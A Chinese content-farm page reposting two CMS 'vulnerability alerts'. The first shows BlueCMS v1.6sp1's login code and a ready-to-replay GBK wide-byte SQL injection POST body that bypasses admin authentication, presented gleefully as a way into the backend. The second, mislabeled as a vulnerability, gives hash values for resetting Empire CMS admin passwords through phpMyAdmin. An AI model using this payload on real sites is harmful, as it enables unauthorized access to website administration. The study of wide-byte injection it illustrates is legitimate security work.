以下是小编为大家准备的bluecms版本双字节密码进后台漏洞预警,本文共2篇,仅供参考,大家一起来看看吧。

篇1:bluecms版本双字节密码进后台漏洞预警
简要描述:
bluecms最新版本即v1.6sp1,处理登录验证时对变量进行单引号转义,但可以用gbk 双字节编码闭合单引号再注释从而进入后台
详细说明:
bluecms验证登录代码如下
function check_admin($name, $pwd)
{
global $db;
$row = $db->getone(“SELECT COUNT(*) AS num FROM ”.table('admin').“ WHERE admin_name='$name' and pwd = md5('$pwd')”);
if($row['num'] >0)
{
return true;
}
else
{
return false;
}
}
且变量进入check_admin函数前已被转义一次,无论MAGIC魔术棒是否开启
if(!get_magic_quotes_gpc)
{
$_POST = deep_addslashes($_POST);
$_GET = deep_addslashes($_GET);
$_COOKIES = deep_addslashes($_COOKIES);
但问题出在这句上
if($this->dbversion() >'4.1'){
mysql_query( “SET NAMES gbk”);
if($this->dbversion() >'5.0.1'){
mysql_query(“SET sql_mode = ''”,$this->linkid);
}
邪恶地笑了
打开后台登录,并准备抓包
用户名和密码随便输 比如jianren jianren
抓到的post变量为 admin_name=jianren&admin_pwd=jianren&submit=%B5%C7%C2%BC&act=do_login
修改为admin_name=jianren%d5%27%20or%201%3d1%23&admin_pwd=jianren&submit=%B5%C7%C2%BC&act=do_login
漏洞证明:
然后重放 芝麻开门
篇2:帝国CMS后台密码重置漏洞漏洞预警
5.0及以前版本:用phpmyadmin修改phome_enewsuser表,把password字段的值设为:e10adc3949ba59abbe56e057f20f883e
密码就是:123456
5.1版本:用phpmyadmin修改phome_enewsuser表里的记录:把password字段的值设为:“322d3fef02fc39251436cb4522d29a71”;把salt字段的值设为:“abc”.
密码就是:123456
★淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警
★iShowMusic V1.2 写入shell漏洞漏洞预警
文档为doc格式